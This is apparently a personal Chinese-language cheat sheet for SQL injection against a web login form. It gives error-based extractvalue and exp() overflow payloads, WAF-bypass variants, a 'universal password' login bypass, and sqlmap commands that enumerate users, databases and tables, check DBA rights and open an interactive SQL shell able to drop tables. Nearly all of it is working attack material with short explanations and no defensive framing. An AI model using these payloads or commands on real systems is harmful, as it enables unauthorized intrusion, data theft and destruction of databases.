SQL注入自用

先试试报错注入type=1&account=1' and extractvalue(1, concat(0x7e, (database()), 0x7e))--+&password=qweqwe&tourl=

把登录报文打包成txt文件送到sqlmap去跑

py sqlmap -r reg.txt -batch

注入当前用户指令

py sqlmap.py -r req.txt -batch -current-user

注入数据库指令

py sqlmap.py -r req.txt -batch -dbs

尝试注入数据库里的表：py sqlmap.py -r req.txt -batch -D emba_apply -tables

exp(709+1)说白了就是换个写法绕 WAF，效果跟 exp (710) 完全一样。

1. 先算数学

709+1 = 710所以：exp(709+1) = exp(710)

2. 为什么要写成 709+1？

因为很多防护规则会直接检测关键字：

• 拦截exp(710)
• 拦截exp(709)

但不会拦截

• exp(709+1)
• exp(700+10)
• exp(100*7+10)

这就是绕 WAF 的小技巧：

-1/exp(710)依然会触发浮点溢出报错

也可以exp里面710-length((user))/710-len((user))搭配使用

也可以把710换成888

710、888、999 本质都是 “随便写的大数”，目的只有一个：让 exp (x) 溢出，触发报错注入，顺便绕 WAF。

如果出现异常 比如730-... 那么user的长度就是730-709=21

解码后得到：
plaintext





s":+'1' or '1'+'like+'1'-)

注入逻辑解析
这是典型的 布尔盲注 / 联合注入 闭合手法：
1. 用 '1' or '1' 构造永真条件，让 SQL 语句恒成立
2. like '1' 进一步模糊匹配，确保条件为真
3. 末尾的 -) 用来闭合原 SQL 语句的括号或注释，避免语法错误

万能密码')or('a'='a

python sqlmap.py -r 1.txt --batch --random-agent --time-sec=2 --risk 3 --is-dba

核心作用：

检测当前注入点的数据库用户是否是最高权限（DBA / 管理员）

--is-dba= 判断当前数据库用户是不是DBA（数据库管理员）

• 是 DBA = 权限极高，可读写任意库、执行系统命令、写文件
• 不是 DBA = 权限受限

python sqlmap.py -r 1.txt --batch --random-agent --time-sec=2 --risk 3 --sql-shell

核心作用：

直接拿到一个可执行 SQL 语句的交互式 shell

--sql-shell= 启动SQL 交互 shell拿到后你可以直接输入：

• select * from users
• show databases
• drop table xxx

等于直接控制目标数据库。

--（注意后面有个空格）是 SQL 的行注释符号，作用是：注释掉它后面的所有代码，让数据库不执行。

闭合 + 注释的完整组合（标准注入测试）

MySQL 里 -- 后面必须跟一个空格否则不生效。

③+

URL 编码里的空格

因为在 URL 里：

• 空格会被编码成+
• 你在浏览器 / 数据包里写--+
• 到后端会自动变成--（带空格）
• 即为万能钥匙定理